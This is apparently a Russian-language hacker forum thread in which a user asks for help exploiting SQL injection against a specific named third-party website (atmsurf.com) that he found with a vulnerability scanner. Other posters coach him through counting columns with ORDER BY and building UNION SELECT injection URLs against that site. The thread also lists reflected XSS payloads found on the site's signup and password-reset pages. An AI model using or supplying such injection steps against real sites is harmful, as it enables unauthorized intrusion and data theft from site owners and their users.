Вообщем нашел один сайтец, там можно провести SQL инъекцию, но у меня не совсем как-то удачно получается :( Может кто-нибудь поможет? Заранее thanks :)

http://atmsurf.com:80/news.php?ocd=view&id=1'+and+'1'='0
http://atmsurf.com:80/news.php?ocd=view&id='

пробовал много вариантов, но никак не получается.

Кстати сканер выдал еще это:

http://atmsurf.com:80/forgot_pass.php/>'><ScRiPt>alert(125764739)%3B</ScRiPt>
http://atmsurf.com:80/signup.php/>'><ScRiPt>alert(121850224)%3B</ScRiPt>

мож там фильтруется все -- вот и не вышло ???

мож там фильтруется все -- вот и не вышло ???

Може быть, поэтому я решил спросить вас. Можно, что либо сделал там или безнадежно :)

http://atmsurf.com:80/forgot_pass.php/>'><ScRiPt>alert(125764739)%3B</ScRiPt>
http://atmsurf.com:80/signup.php/>'><ScRiPt>alert(121850224)%3B</ScRiPt>

Acunetix Web Vul рулит ? =)
кол-во столбцов подобрал хоть? влом просто )
или не можешь имена подобрать ?

Acunetix Web Vul рулит ? =)
кол-во столбцов подобрал хоть? влом просто )
или не можешь имена подобрать ?

Ага, хороший сканер=)
Там, кол-во столбцов пробовал подгонять, но постоянно пишут ошибку, хотя там их не много это я знаю.
А, ошибку постоянно выдает :(

опиши способ "подгона" )

опиши способ "подгона" )
Ну, допустим

http://atmsurf.com/news.php?ocd=view&id=1'+union+select+null,null/*
так выдает ошибку.
http://atmsurf.com/news.php?ocd=view&id=1+union+select+null,null/*
так нет.
Пробовал еще несколько вариантов.

эм а ковычка тут нафиг не нужна :)
поэтому
http://atmsurf.com/news.php?ocd=view&id=1/*
потом щитаеш кол-во столбцов, с помощью order by
http://atmsurf.com/news.php?ocd=view&id=1 order by 10/*
если выдало ошибку, то столбцов меньше, чем 10
подбираеш пока не узнаеш кол-во столбцов, потом собственно юзаеш union

зы уже сто раз расписали, как это делать :)

потом щитаеш кол-во столбцов, с помощью order by
http://atmsurf.com/news.php?ocd=view&id=1 order by 10/*
если выдало ошибку, то столбцов меньше, чем 10


А если и 100 и 200 вписываешь?
И ошибку не выдает.
Полей, то всяко 100 не может быть :)

_http://atmsurf.com:80/news.php?ocd=view&id=1'+union+select+null,null,null,null,null,null,n ull,null/*

и в чем проблема ? =) валяй даьше..

http://atmsurf.com:80/news.php?ocd=view&id=1'+and+'1'='0
http://atmsurf.com:80/news.php?ocd=view&id='

у тебя не получится выбрать данные из другой таблицы при помощи юнион запроса, если в скрипте выбирается только один кортеж из таблицы, если в выборке будет не одна запись, то можно прикрутить юнион запрос, как тебе показали выше
http://atmsurf.com/news.php?ocd=view&id=1+union+select+null,null/*
кол-во null, будет соответствовать кол-во выбираемых полей из таблицы в прикрученном юнион их должно быть столько же, подбирай кол-во столбцов до того момента как запрос не отработает без ошибок, потом можешь подбирать название таблицы. В общем более подробно я описал это здесь:
http://www.bit-team.com/modules.php?name=Articles&file=view&articles_id=13

http://www.bit-team.com/modules.php?name=Articles&file=view&articles_id=13 Отличный Мануал! Спасибо!
Возьму на заметку!

http://www.bit-team.com/modules.php?name=Articles&file=view&articles_id=13
Он был на ачате